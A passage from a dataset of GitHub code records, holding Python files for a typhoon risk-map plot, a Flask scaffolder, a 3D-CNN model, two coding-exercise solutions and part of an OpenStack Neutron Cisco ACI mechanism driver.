vy\n self.w = wind\n self.p = pres\n self.d = data #此网格中有多少个数据点,因此可以对速度求和并求平均值\n #self.t = temp \n######################可以导入此文件夹的所有的TXT文件###################################\n#f = open('./A/CH1949BST.txt', 'r+')\n # 定义figure\nyear=[]\nmonth=[]\nday=[]\nI=[]\nLAT=[]\nLONG=[]\nPRES=[]\nWND=[]\n\n#x = [0 for i in range(150)] #也可以b = [0]*10 \n#for i in range(150):\n# x[i]=i\n##print (x)\n#\n#y = [0 for i in range(54)] #也可以b = [0]*10 \n#for i in range(54):\n# y[i]=i\n#print (y)\n\n# matrix = [[range(0, 150, 1)] for i in range(56)]\nmatrix=np.full((55,150),0,dtype=int)\n#print(matrix)\n\n\nfor filename in os.listdir(\"C:/Users/whuxu/Desktop/code/A\"): \n# print(\"C:/Users/whuxu/Desktop/code/A/\" + filename)\n with open(\"C:/Users/whuxu/Desktop/code/A/\"+filename) as f:\n\n# plt.figure() \n k = f.read() \n lines = k.split('\\n') #用空格键进行分割\n for l in lines:\n lastyear = None\n sp = l.split(' ') #用空格进行分割,分成不同的数组元素\n sp = [y for y in sp if y != ''] \n try:\n if ((sp[1] == '0')or(sp[1] == '1')or(sp[1] == '2')or(sp[1] == '3')or(sp[1] == '4')or(sp[1] == '5')or(sp[1] == '6')or(sp[1] == '9')): \n #date\n # print(l)\n t1 = sp[0]\n year1 = t1[:4] \n month1 = int(t1[5:6]) \n day1 = t1[7:8]\n lat1 = int(sp[2])/10 \n LAT1=int(lat1)\n lon1 = int(sp[3])/10\n LON1 = int(lon1)\n wind1 = int(sp[5])\n pres1 = int(sp[4])\n #intensity\n if(int(sp[5])>=10.8): \n WND.append(wind1) \n year.append(year1) \n \n day.append(day1) \n month.append(month1)\n I.append(sp[1])\n PRES.append(sp[4])\n LAT.append(lat1)\n LONG.append(lon1) \n print(sp[0])\n# print(LON1)\n# print(LAT1)\n # matrix[LON1][LAT1]=matrix[LON1][LAT1]+int(sp[5])\n matrix[LAT1][LON1]=matrix[LAT1][LON1]+int(sp[5])\n # print(matrix[LAT1][LON1])\n # print(year)\n #热带或外来的\n if 
sp[1] == '6':\n ex1 = False\n else:\n ex1 = True\n #position\n \n \n if lastyear is not None and lastlon < 180.0 and lastlat < 50.0 and (t1[6:8] == \"00\" or t1[6:8] == \"06\" or t1[6:8] == \"12\" or t1[6:8] == \"18\"):\n dlat = lat1 - lastlat\n dlon = lon1 - lastlon\n dwind = wind1 - lastwind\n dpres = pres1 - lastpres\n \n grid[lastmonth - 1][math.floor(lastlat)][math.floor(lastlon) - 100].x += dlat\n grid[lastmonth - 1][math.floor(lastlat)][math.floor(lastlon) - 100].y += dlon\n grid[lastmonth - 1][math.floor(lastlat)][math.floor(lastlon) - 100].w += dwind\n grid[lastmonth - 1][math.floor(lastlat)][math.floor(lastlon) - 100].p += dpres\n grid[lastmonth - 1][math.floor(lastlat)][math.floor(lastlon) - 100].d += 1\n \n lastyear = year1\n lastmonth = month1\n lastday = day1\n lastlat = lat1\n lastlon = lon1\n lastwind = wind1\n lastpres = pres1\n if sp[0] == '66666': #reset all of the last things and bypass adding a point between storm end & start positions \n datafile = cbook.get_sample_data('C:/Users/whuxu/Desktop/code/China_map/China.png')\n # img = imread(datafile) \n # plt.plot(LONG,LAT,zorder=0.5)\n # plt.scatter(LONG, LAT, color=color_seq)\n # plt.imshow(img, zorder=0, extent=[70, 150, 0, 55]) \n del LONG[:]\n del LAT[:]\n lastyear = None \n except:\n## plt.show()\n# #STR=str(filename);\n# #plt.savefig('C:/Users/whuxu/Desktop/'+STR+'.png',dpi=500)\n# #plt.savefig('C:/Users/whuxu/Desktop/code/China_PATH/'+STR+'.png',dpi=500)\n# \n# #fig=plt.figure()\n print(\"end of file... probably\")\n## print(matrix)\nprint(matrix)\n#contour(matrix) # 等高线自动选择\nz_list = []\nfor y in range(55):\n for x in range(150):\n z = matrix[y][x]\n z_list.append(z) #获得z的数据\nz = z_list \nx = np.linspace(0,159,150)\ny = np.linspace(0,54,55) \n[X,Y] = np.meshgrid(x,y) #生成X,Y画布,X,Y都是3*3\n#因为z是一维,所以要变成3*3\nz = np.mat(z) \nz = np.array(z)\nz.shape = (55,150)\nprint (len(x))\nprint(z.shape[1])\n#画图(建议一定要查看X,Y,z是不是一一对应了)\nplt.figure(figsize=(10,6))\ndatafile = cbook.get_sample_data('C:/Users/whuxu/Desktop/code/white.png')\nimg = imread(datafile) \nplt.contourf(x,y,z,zorder=0.5)\nplt.contour(x,y,z,zorder=0.5)\nplt.imshow(img, zorder=0, extent=[70, 150, 0, 55]) \nplt.show()\n\n\n","repo_name":"tangrui2018/Mathmodel","sub_path":"code/Riskmap.py","file_name":"Riskmap.py","file_ext":"py","file_size_in_byte":6831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3956878313","text":"import os\n\n\n#arquivo para criar projetos básicos em flask \n\ndef changedir():\n path = input(\"Digite o diretório que deseja criar o projeto: \")\n os.chdir(path)\n\n\ndef makefolders():\n os.mkdir('static')\n os.mkdir('templates')\n\n\ndef create_app():\n app = open(\"app.py\",\"w\")\n line = [\"import os\\n\",\"from flask import Flask,\",\n \"render_template,request,redirect,url_for,jsonify\\n\",\n \"from flask_sqlalchemy import SQLAlchemy\\n\",\n \"import sys\\n\",\"app = Flask(__name__)\\n\",\n \"#create the app config, including the database data\\n\",\n \"#templates folder for html, static for css an js files\\n\",\n \"migrate = Migrate(app, db)\\n\"]\n for lines in line:\n app.write(lines)\n\ndef main():\n changedir()\n makefolders()\n create_app()\n\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"tgomes1992/Python-Utilities","sub_path":"os_utilities/flask_structure.py","file_name":"flask_structure.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} 
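A note on the flask_structure.py record above: the app.py it writes out ends by emitting "migrate = Migrate(app, db)", yet none of the emitted lines import Migrate or define db, so the scaffolded file cannot run as written. Below is a minimal sketch of the pieces the generated file would still need, assuming Flask-SQLAlchemy and Flask-Migrate are the intended dependencies; the database URL default and the app.run() call are illustrative additions, not part of the original record.

# Hypothetical completion of the scaffolded app.py; Migrate and db are
# otherwise undefined in the output of create_app() above.
import os

from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from flask_migrate import Migrate

app = Flask(__name__)
# Illustrative default; a real project would read this from its environment.
app.config["SQLALCHEMY_DATABASE_URI"] = os.environ.get("DATABASE_URL", "sqlite:///app.db")

db = SQLAlchemy(app)
migrate = Migrate(app, db)

if __name__ == "__main__":
    app.run(debug=True)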
+{"seq_id":"33587010332","text":"from rC3Dmodules import *\n\nclass rC3D(BasicTrainableClassifier):\n def __init__(self, in_c, num_classes, **kwargs):\n super().__init__(**kwargs)\n self.ls = nn.Sequential(rC3DBlockMP(in_c, 64, True),\n rC3DBlockMP(64, 128, True),\n rC3DBlockMP(128, 256, True),\n rC3DBlock(256, 512),\n rC3DBlock(512, 512))\n self.pool = StackPool(1)\n self.fc = nn.Linear(256,num_classes)\n init_cnn(self)\n def __call__(self, X):\n fm = self.ls(X)\n pfm = self.pool(fm)\n ft = self.fc(torch.flatten(pfm,start_dim=1))\n return ft","repo_name":"domhuh/camASL","sub_path":"models/rC3D.py","file_name":"rC3D.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"71390029925","text":"class Solution:\n def freqAlphabets(self, s: str) -> str:\n alp = \"abcdefghijklmnopqrstuvwxyz\"\n res = \"\"\n dict= {}\n for i in range(1,27):\n cur = str(i)\n if i >= 10:\n cur = cur + \"#\"\n dict[cur] = alp[i-1]\n\n i = 0\n while i < (len(s)):\n cur = s[i]\n if i+2 < len(s):\n if s[i+2] ==\"#\":\n cur = cur + s[i+1]+s[i+2]\n i = i + 2\n res = res + dict[cur]\n\n i = i + 1\n\n return res\n\nprint(Solution.freqAlphabets(Solution,\"12345678910#11#12#13#14#15#16#17#18#19#20#21#22#23#24#25#26#\"))\n\n\n\n\n\n","repo_name":"AllanZheng/Leetcode","sub_path":"problems/String/1309. Decrypt String from Alphabet to Integer Mapping/1309. Decrypt String from Alphabet to Integer Mapping.py","file_name":"1309. Decrypt String from Alphabet to Integer Mapping.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74508973603","text":"import sys\nfrom collections import deque\nn=int(input())\nq=deque()\n\nfor i in range(n):\n l=sys.stdin.readline().split()\n\n if l[0]=='push':\n q.append(l[1])\n\n elif l[0]=='pop':\n if len(q)!=0:\n print(q.popleft())\n else :\n print(-1)\n elif l[0]=='size':\n print(len(q))\n elif l[0] =='empty':\n if len(q)==0:\n print(1) \n else: print(0)\n elif l[0] =='front':\n if len(q)!=0:\n print(q[0])\n else : #0이면\n print(-1)\n else:\n if len(q)!=0 :\n print(q[-1]) \n else: \n print(-1)","repo_name":"young0264/hellopycharm","sub_path":"백준/18258.큐2.py","file_name":"18258.큐2.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31593962433","text":"from neutron import service\nfrom neutron_lib.api.definitions import availability_zone as az_def\nfrom neutron_lib.api.definitions import external_net as extnet_def\nfrom neutron_lib.callbacks import events\nfrom neutron_lib.callbacks import registry\nfrom neutron_lib import constants as n_const\nfrom neutron_lib import exceptions as n_exc\nfrom neutron_lib.plugins import directory\nfrom neutron_lib.plugins.ml2 import api\nfrom neutron_lib.api.definitions import portbindings\nfrom neutron_lib import rpc as n_rpc\nfrom oslo_log import log as logging\nfrom oslo_log import helpers as log_helpers\n\nfrom networking_aci._i18n import _LI, _LW\nfrom networking_aci.extensions.acioperations import Acioperations # noqa, import enables extension\nfrom networking_aci.plugins.ml2.drivers.mech_aci import allocations_manager as allocations\nfrom networking_aci.plugins.ml2.drivers.mech_aci import common\nfrom networking_aci.plugins.ml2.drivers.mech_aci import constants as aci_const\nfrom networking_aci.plugins.ml2.drivers.mech_aci import exceptions as aci_exc\nfrom 
networking_aci.plugins.ml2.drivers.mech_aci.config import ACI_CONFIG, CONF\nfrom networking_aci.plugins.ml2.drivers.mech_aci import rpc_api\nfrom networking_aci.plugins.ml2.drivers.mech_aci.trunk import ACITrunkDriver\n\nLOG = logging.getLogger(__name__)\n\n\n@registry.has_registry_receivers\nclass CiscoACIMechanismDriver(api.MechanismDriver):\n def __init__(self):\n LOG.info(_LI(\"ACI mechanism driver initializing...\"))\n self.topic = None\n self.conn = None\n self._plugin_property = None\n self.db = common.DBPlugin()\n self.rpc_api = rpc_api.AgentRpcCallback(self.db)\n self.allocations_manager = allocations.AllocationsManager(self.db)\n\n ACI_CONFIG.db = self.db\n self.rpc_notifier = rpc_api.ACIRpcClientAPI()\n self.trunk_driver = ACITrunkDriver.create()\n self.vif_details = {\n portbindings.VIF_DETAILS_CONNECTIVITY: self.connectivity\n }\n\n def initialize(self):\n pass\n\n @property\n def connectivity(self):\n return portbindings.CONNECTIVITY_L2\n\n @property\n def _plugin(self):\n if self._plugin_property is None:\n self._plugin_property = directory.get_plugin()\n return self._plugin_property\n\n def _setup_rpc(self):\n \"\"\"Initialize components to support agent communication.\"\"\"\n self.endpoints = [\n self.rpc_api,\n ]\n\n @log_helpers.log_method_call\n def start_rpc_listeners(self):\n \"\"\"Start the RPC loop to let the plugin communicate with agents.\"\"\"\n self._setup_rpc()\n self.topic = aci_const.ACI_TOPIC\n self.conn = n_rpc.Connection()\n self.conn.create_consumer(self.topic, self.endpoints, fanout=False)\n\n return self.conn.consume_in_threads()\n\n def get_workers(self):\n return [service.RpcWorker([self], worker_process_count=0)]\n\n def bind_port(self, context):\n port = context.current\n host = common.get_host_from_profile(context.current.get('binding:profile'), context.host)\n\n LOG.debug(\"Using binding host %s for binding port %s\", host, port['id'])\n hostgroup_name, hostgroup = ACI_CONFIG.get_hostgroup_by_host(context._plugin_context, host)\n\n if not hostgroup:\n LOG.warning(\"No aci config found for binding host %s while binding port %s\", host, port['id'])\n return\n\n if hostgroup['fabric_transit']:\n raise aci_exc.TransitBindingProhibited(port_id=port['id'], host=host)\n\n if len(context.segments_to_bind) < 1:\n LOG.warning(\"No segments found for port %s with host %s - very unusual\", port['id'], host)\n return\n\n # direct baremetal-on-aci needs to be annotated with physnet (and other stuff)\n if hostgroup['direct_mode']:\n ACI_CONFIG.annotate_baremetal_info(context._plugin_context, hostgroup, context.network.current['id'],\n override_project_id=port['project_id'])\n\n # hierarchical or direct?\n if not context.binding_levels:\n self._bind_port_hierarchical(context, port, hostgroup_name, hostgroup)\n elif hostgroup['finalize_binding'] or \\\n (hostgroup['direct_mode'] and\n hostgroup['hostgroup_mode'] in (aci_const.MODE_BAREMETAL, aci_const.MODE_INFRA)):\n # direct binding for a) baremetal on aci and b) infra mode (2nd level)\n self._bind_port_direct(context, port, hostgroup_name, hostgroup)\n\n def _bind_port_hierarchical(self, context, port, hostgroup_name, hostgroup):\n # find the top segment (no physnet, type vxlan); there should be only one, but who knows\n for segment in context.segments_to_bind:\n if segment[api.NETWORK_TYPE] == 'vxlan' and segment['physical_network'] is None:\n break\n else:\n LOG.error(\"No usable segment found for hierarchical portbinding, candidates were: %s\",\n context.segments_to_bind)\n return\n\n segment_physnet = 
hostgroup.get('physical_network')\n if not segment_physnet:\n LOG.error(\"Cannot bind port %s: Hostgroup %s has no physical_network set, cannot allocate segment\",\n port['id'], hostgroup_name)\n return\n\n # For now we assume only two levels in hierarchy. The top level VXLAN/VLAN and\n # one dynamically allocated segment at level 1\n level = 1\n\n network = context.network.current\n segment_type = hostgroup.get('segment_type', 'vlan')\n if hostgroup.get('hostgroup_mode') != aci_const.MODE_BAREMETAL:\n # VM mode\n allocation = self.allocations_manager.allocate_segment(network, segment_physnet, level, hostgroup)\n segmentation_id = allocation.segmentation_id\n segment_id = allocation.segment_id\n else:\n # baremetal objects use a different physnet and gets allocated to its own segment\n # check that no baremetal-on-aci port from another project is in this network\n segment_prefix = \"{}-\".format(CONF.ml2_aci.baremetal_resource_prefix)\n for seg_port in self.db.get_ports_on_network_by_physnet_prefix(context._plugin_context,\n network['id'], segment_prefix):\n if seg_port['project_id'] != port['project_id']:\n msg = (\"Cannot bind port {}: Hostgroup {} has baremetal port {} belonging to project {}, \"\n \"new port is from project {} - aborting binding\"\n .format(port['id'], hostgroup['name'], seg_port['port_id'], seg_port['project_id'],\n port['project_id']))\n LOG.error(msg)\n raise n_exc.NeutronException(msg)\n\n ACI_CONFIG.annotate_baremetal_info(context._plugin_context, hostgroup, network['id'],\n override_project_id=port['project_id'])\n if aci_const.TRUNK_PROFILE in port['binding:profile']:\n segmentation_id = port['binding:profile'][aci_const.TRUNK_PROFILE].get('segmentation_id', 1)\n else:\n segmentation_id = None # let the allocater choose a vlan\n allocation = self.allocations_manager.allocate_baremetal_segment(context._plugin_context, network,\n hostgroup, level, segmentation_id)\n segment_id = allocation.id\n segmentation_id = allocation.segmentation_id\n\n if not allocation:\n LOG.error(\"Binding failed, could not allocate a segment for further binding levels \"\n \"for port %(port)s\",\n {'port': context.current['id']})\n return\n\n next_segment = {\n 'segmentation_id': segmentation_id,\n 'network_id': network['id'],\n 'network_type': segment_type,\n 'physical_network': segment_physnet,\n 'id': segment_id,\n 'is_dynamic': False,\n 'segment_index': level\n }\n\n LOG.info(\"Next segment to bind for port %s on %s: %s\", port['id'], segment[\"id\"], next_segment)\n if not hostgroup['direct_mode']:\n # for direct mode the rpc call will be made by the next level binding\n ACI_CONFIG.clean_bindings(context._plugin_context, hostgroup, allocation.segment_id, level=level)\n self.rpc_notifier.bind_port(context._plugin_context, port, hostgroup, segment, next_segment)\n context.continue_binding(segment[\"id\"], [next_segment])\n\n def _bind_port_direct(self, context, port, hostgroup_name, hostgroup):\n segment_physnet = hostgroup.get('physical_network')\n\n for segment in context.segments_to_bind:\n if segment[api.PHYSICAL_NETWORK] == segment_physnet:\n vif_details = {\n 'aci_directly_bound': True,\n }\n next_segment = {\n 'segmentation_id': segment['segmentation_id'],\n }\n if not hostgroup['finalize_binding']:\n # annotate baremetal resource name for baremetal group (if necessary)\n network = context.network.current\n ACI_CONFIG.annotate_baremetal_info(context._plugin_context, hostgroup, network['id'],\n override_project_id=port['project_id'])\n\n if hostgroup['hostgroup_mode'] == 
aci_const.MODE_BAREMETAL and \\\n aci_const.TRUNK_PROFILE in port['binding:profile']:\n port_type_str = \"trunk port\"\n else:\n port_type_str = \"access port\"\n\n self.rpc_notifier.bind_port(context._plugin_context, port, hostgroup, segment, next_segment)\n else:\n port_type_str = \"finalized portbinding w/o direct-mode set\"\n vif_details['aci_finalized_binding'] = True\n context.set_binding(segment['id'], aci_const.VIF_TYPE_ACI, vif_details, n_const.ACTIVE)\n LOG.info(\"Directly bound port %s to hostgroup %s with segment %s vlan %s (%s)\",\n port['id'], hostgroup_name, segment['id'], segment['segmentation_id'], port_type_str)\n\n return\n\n LOG.error(\"ACI driver tried to directly bind port %s to segment %s, but it could not be found, options: %s\",\n port['id'], segment_physnet,\n \", \".join(seg[api.PHYSICAL_NETWORK] for seg in context.segments_to_bind))\n\n # Network callbacks\n def create_network_precommit(self, context):\n az_hints = context.current.get(az_def.AZ_HINTS)\n if len(az_hints) > 1:\n raise aci_exc.OnlyOneAZHintAllowed()\n\n def create_network_postcommit(self, context):\n external = self._network_external(context)\n self.rpc_notifier.create_network(context._plugin_context, context.current, external=external)\n\n def delete_network_postcommit(self, context):\n self.rpc_notifier.delete_network(context._plugin_context, context.current)\n\n def create_subnet_postcommit(self, context):\n if not CONF.ml2_aci.handle_all_l3_gateways or \\\n aci_const.CC_FABRIC_L3_GATEWAY_TAG in context.network.current['tags']:\n return\n\n address_scope_name = None\n\n network = context._plugin.get_network(context._plugin_context, context.current['network_id'])\n external = bool(network.get('router:external'))\n network_az = None\n if network.get(az_def.AZ_HINTS):\n network_az = network[az_def.AZ_HINTS][0]\n\n if external:\n subnetpool_id = context.current['subnetpool_id']\n\n if subnetpool_id is None:\n # TODO Set network to Down\n LOG.warn(_LW(\"Subnet {} is attached to an external network but is not using a subnet pool, \"\n \"further configuration of this network in ACI is not possible\"\n .format(context.current['id'])))\n return\n\n address_scope_name = self.db.get_address_scope_name(context._plugin_context, subnetpool_id)\n if address_scope_name is None:\n # TODO Set network to Down\n LOG.warn(_LW(\"Subnet {} is attached to an external network but in an address scope, \"\n \"further configuration of this network in ACI is not possible\"\n .format(context.current['id'])))\n return\n\n self.rpc_notifier.create_subnet(context._plugin_context, context.current, external=external,\n address_scope_name=address_scope_name, network_az=network_az)\n\n def delete_subnet_postcommit(self, context):\n if not CONF.ml2_aci.handle_all_l3_gateways or \\\n aci_const.CC_FABRIC_L3_GATEWAY_TAG in context.network.current['tags']:\n return\n\n network_id = context.current['network_id']\n subnetpool_id = context.current['subnetpool_id']\n if subnetpool_id is None:\n LOG.warn(_LW(\"Subnet {} is attached to an external network but is not using a subnet pool, \"\n \"further configuration of this network in ACI is not possible\"\n .format(context.current['id'])))\n return\n\n address_scope_name = self.db.get_address_scope_name(context._plugin_context, subnetpool_id)\n network = context._plugin.get_network(context._plugin_context, network_id)\n external = bool(network.get('router:external'))\n network_az = None\n if network.get(az_def.AZ_HINTS):\n network_az = network[az_def.AZ_HINTS][0]\n subnets = 
context._plugin.get_subnets_by_network(context._plugin_context, network_id)\n last_on_network = len(subnets) == 0\n self.rpc_notifier.delete_subnet(context._plugin_context, context.current, external=external,\n address_scope_name=address_scope_name, network_az=network_az,\n last_on_network=last_on_network)\n\n @registry.receives(aci_const.CC_FABRIC_TRANSIT, [events.AFTER_CREATE])\n def on_fabric_transit_created(self, resource, event, trigger, payload):\n network_id = payload.metadata['network_id']\n host = payload.metadata['host']\n LOG.info(\"Got transit creation notification for transit host %s network %s, syncing network\",\n host, network_id)\n\n # get network sync data\n try:\n network = self._plugin.get_network(payload.context, network_id)\n except n_exc.NetworkNotFound as e:\n LOG.error(\"Could not sync transit %s network %s - network does not exist! (Error was %s)\",\n host, network_id, e)\n return\n\n sync_data = self.rpc_api._get_network(payload.context, network)\n\n # send to agent\n self.rpc_notifier.sync_network(payload.context, sync_data)\n\n @registry.receives(aci_const.CC_FABRIC_NET_GW, [events.BEFORE_UPDATE])\n def on_network_gateway_move(self, resource, event, trigger, payload):\n network_id = payload.metadata['network_id']\n if not payload.metadata['move-to-cc-fabric']:\n LOG.warning(\"Moving a gateway _away_ from cc-fabric is not supported by ACI yet (for network %s)\",\n network_id)\n return\n\n LOG.info(\"Got request to move l3 gateway away from ACI for network %s\", network_id)\n\n try:\n network = self._plugin.get_network(payload.context, network_id)\n except n_exc.NetworkNotFound as e:\n LOG.error(\"Could not find network %s - network does not exist! (Error was %s)\",\n network_id, e)\n return\n\n if not network[extnet_def.EXTERNAL]:\n LOG.error(\"Got event to move gateway of network %s, which is NOT an external network!\", network_id)\n return\n\n subnets_to_delete = []\n for subnet_id in network['subnets']:\n subnet = self._plugin.get_subnet(payload.context, subnet_id)\n subnetpool_id = subnet['subnetpool_id']\n address_scope_name = self.db.get_address_scope_name(payload.context, subnetpool_id)\n if address_scope_name is None:\n continue\n subnets_to_delete.append((subnet, address_scope_name))\n\n for n, (subnet, address_scope_name) in enumerate(subnets_to_delete):\n last_on_network = n + 1 == len(network['subnets'])\n self.rpc_notifier.delete_subnet(payload.context, subnet, external=True,\n address_scope_name=address_scope_name, last_on_network=last_on_network)\n\n # Port callbacks\n def create_port_precommit(self, context):\n self._check_port_az_affinity(context._plugin_context, context.network.current, context.current)\n\n def update_port_precommit(self, context):\n # only check AZ again if binding host changed\n orig_host = common.get_host_from_profile(context.original['binding:profile'],\n context.original['binding:host_id'])\n curr_host = common.get_host_from_profile(context.current['binding:profile'],\n context.current['binding:host_id'])\n if orig_host != curr_host:\n curr_hostgroup_name, curr_hostgroup = ACI_CONFIG.get_hostgroup_by_host(context._plugin_context, curr_host)\n if curr_hostgroup_name is not None:\n self._check_port_az_affinity(context._plugin_context, context.network.current, context.current)\n\n def _check_port_az_affinity(self, context, network, port):\n host = common.get_host_from_profile(port['binding:profile'], port['binding:host_id'])\n hostgroup_name, hostgroup = ACI_CONFIG.get_hostgroup_by_host(context, host)\n if not hostgroup:\n 
return # ignore unknown binding_hosts\n\n # no checks are done for external networks, as these can be stretched across AZs\n if network[extnet_def.EXTERNAL]:\n return\n\n az_hints = network.get(az_def.AZ_HINTS)\n if az_hints:\n az_hint = az_hints[0]\n hg_az = [hostgroup['host_azs'][host]] if host in hostgroup['host_azs'] else hostgroup['availability_zones']\n if len(hg_az) > 1 or az_hint != hg_az[0]:\n exc = aci_exc.HostgroupNetworkAZAffinityError(port_id=port['id'], hostgroup_name=hostgroup_name,\n host=host, hostgroup_az=\", \".join(hg_az),\n network_az=az_hint)\n if CONF.ml2_aci.az_checks_enabled:\n raise exc\n else:\n LOG.warning(\"Binding port with non-matching AZ: %s\", exc)\n\n def update_port_postcommit(self, context):\n orig_host = common.get_host_from_profile(context.original['binding:profile'],\n context.original['binding:host_id'])\n curr_host = common.get_host_from_profile(context.current['binding:profile'],\n context.current['binding:host_id'])\n\n if orig_host != curr_host:\n # binding host differs, find out if:\n # * old binding host is valid\n # * new binding host is either invalid or valid AND belongs to a diffrent hostgroup\n orig_hostgroup_name, orig_hostgroup = ACI_CONFIG.get_hostgroup_by_host(context._plugin_context, orig_host)\n curr_hostgroup_name, curr_hostgroup = ACI_CONFIG.get_hostgroup_by_host(context._plugin_context, curr_host)\n\n if orig_hostgroup and \\\n (curr_hostgroup is None or (curr_hostgroup and orig_hostgroup_name != curr_hostgroup_name)):\n if CONF.ml2_aci.handle_port_update_for_non_baremetal or \\\n orig_hostgroup['direct_mode'] and orig_hostgroup['hostgroup_mode'] == aci_const.MODE_BAREMETAL:\n # handle port update\n LOG.info('Calling cleanup for port %s (hostgroup transition from \"%s\" to \"%s\")',\n context.current['id'], orig_hostgroup_name, curr_hostgroup_name)\n\n # apparently context.network.original is not set, but the ml2_plugin always fetches\n # the original port's network, so context.current should work. 
nevertheless, safeguarding this\n if context.original['network_id'] != context.network.current['id']:\n LOG.error(\"Port %s original port has network id %s, context.network.current is %s, omitting!\",\n context.current['id'], context.current['network_id'], context.network.current['id'])\n return\n\n self.cleanup_segment_if_needed(context._plugin_context, context.original, context.network.current,\n context.original_binding_levels,\n context.original_bottom_bound_segment)\n else:\n LOG.info(\"Ignoring host transition for port %s from host %s hostgroups %s to host %s hostgroup %s\",\n context.current['id'], orig_host, orig_hostgroup_name, curr_host, curr_hostgroup_name)\n\n def delete_port_postcommit(self, context):\n # For now we look only at the bottom bound segment - works for this use case\n # but will need some review if we ever have several dynamically bound segements\n # network_id = context.network.current['id']\n self.cleanup_segment_if_needed(context._plugin_context, context.current, context.network.current,\n context.binding_levels, context.bottom_bound_segment)\n\n def cleanup_segment_if_needed(self, context, port, network, binding_levels, segment):\n if not segment:\n return\n\n # only handle cleanup for ports bound by the aci driver as top segment\n if not binding_levels or binding_levels[0][api.BOUND_DRIVER] != aci_const.ACI_DRIVER_NAME:\n return\n\n host = common.get_host_from_profile(port['binding:profile'], port['binding:host_id'])\n _, hostgroup = ACI_CONFIG.get_hostgroup_by_host(context, host)\n if not hostgroup:\n return\n\n # Get segment from ml2_port_binding_levels based on segment_id and host\n # if no ports on this segment for host we can remove the aci allocation.\n # In baremetal mode we need to call cleanup when the hostgroup is no longer on the physnet\n released = self.allocations_manager.release_segment(network, hostgroup, 1, segment)\n if not (released or hostgroup['direct_mode']):\n return\n\n # Call to ACI to delete port if the segment is released i.e.\n # port is the last for the network one on the host\n # Check if physical domain should be cleared\n ACI_CONFIG.annotate_baremetal_info(context, hostgroup, network['id'], override_project_id=port['project_id'])\n clearable_physdoms = []\n if released:\n # physdoms will only be removed on segment removal\n clearable_physdoms = self._get_clearable_phys_doms(context, network['id'],\n segment, hostgroup, port['project_id'])\n\n clearable_bm_entities = []\n reset_bindings_to_infra = False\n if hostgroup['direct_mode']:\n # if this hostgroup has hosts left we cancel the removal\n hosts_on_network = self.db.get_hosts_on_network(context, network['id'], level=1)\n if any(host in hosts_on_network for host in hostgroup['hosts']):\n return\n\n # if this is a infra-mode binding make sure no VM port is bound before removing it\n # (this should never be the case)\n if hostgroup['hostgroup_mode'] == aci_const.MODE_INFRA:\n parent_hostgroup = ACI_CONFIG.get_hostgroup(context, hostgroup['parent_hostgroup'])\n if any(host in hosts_on_network for host in parent_hostgroup['hosts']):\n # parent group has still a binding, we might have set one of the VPCs to access mode\n # therefore we need to resync the binding. 
As this might interfere with other ports\n # joining/leaving the network we do a network sync here\n ACI_CONFIG.clean_bindings(context, parent_hostgroup, segment['id'], level=1)\n LOG.debug(\"Port %s in network %s is in hostgroup %s, parent hostgroup %s, which needs a resync, \"\n \"as this network has the parent hostgroup as member, but not the child anymore\",\n port['id'], network['id'], hostgroup['name'], parent_hostgroup['name'])\n\n self.rpc_notifier.sync_network_id(context, network['id'])\n return\n\n if hostgroup['direct_mode'] and hostgroup['hostgroup_mode'] == aci_const.MODE_BAREMETAL:\n # if this hostgroup has no host left on the physnet we can reset the VPC/bindings\n hosts_on_physnet = self.db.get_hosts_on_physnet(context, hostgroup['physical_network'], level=1)\n if not any(host in hosts_on_physnet for host in hostgroup['hosts']):\n reset_bindings_to_infra = True\n\n # if this port is the last from a project we clear out the bm entities on ACI\n seg_prefix = ACI_CONFIG.baremetal_resource_prefix\n projects_on_physnets = self.db.get_bound_projects_by_physnet_prefix(context, seg_prefix)\n if port['project_id'] not in projects_on_physnets:\n clearable_bm_entities.append(ACI_CONFIG.gen_bm_resource_name(port['project_id']))\n\n LOG.debug(\"Sending RPC delete_port for port %s hostgroup %s with clearable physdoms %s \"\n \"clearable bm-entities %s and reset-bindings-to-infra %s\",\n port['id'], hostgroup['name'], clearable_physdoms, clearable_bm_entities, reset_bindings_to_infra)\n self.rpc_notifier.delete_port(context, port, hostgroup, clearable_physdoms, clearable_bm_entities,\n reset_bindings_to_infra)\n\n def _get_clearable_phys_doms(self, context, network_id, local_segment, host_config, project_id):\n clearable_physdoms = set(host_config['physical_domain'])\n for other_segment in common.get_segments(context, network_id):\n if other_segment['physical_network'] is None:\n continue\n other_physdoms = ACI_CONFIG.get_physdoms_by_physnet(context, other_segment['physical_network'], network_id,\n project_id)\n if not other_physdoms:\n LOG.warning(\"No config found for segment %s physical network %s in network %s\",\n local_segment['id'], other_segment['physical_network'], network_id)\n continue\n other_physdoms = set(other_physdoms)\n for physdom in clearable_physdoms & other_physdoms:\n LOG.debug(\"Not clearing physdom %s from epg %s for segment %s as it is still in use by segment %s\",\n physdom, network_id, local_segment['id'], other_segment['id'])\n clearable_physdoms -= other_physdoms\n if not clearable_physdoms:\n break\n\n LOG.debug(\"Found %d clearable physdoms for network %s segment %s (%s)\",\n len(clearable_physdoms), network_id, local_segment['id'],\n \", \".join(clearable_physdoms) or \"\")\n\n return clearable_physdoms\n\n @staticmethod\n def _network_external(context):\n current = context.current\n network_id = current['id']\n network = context._plugin.get_network(context._plugin_context, network_id)\n\n if network.get('router:external'):\n return True\n\n return False\n\n @staticmethod\n def _get_subnet_pool_name(context, subnet_pool_id):\n pool = context._plugin.get_subnetpool(context._plugin_context, subnet_pool_id)\n\n if not pool:\n LOG.warn(_LW(\"Pool {} does not exist\".format(subnet_pool_id)))\n return\n\n return 
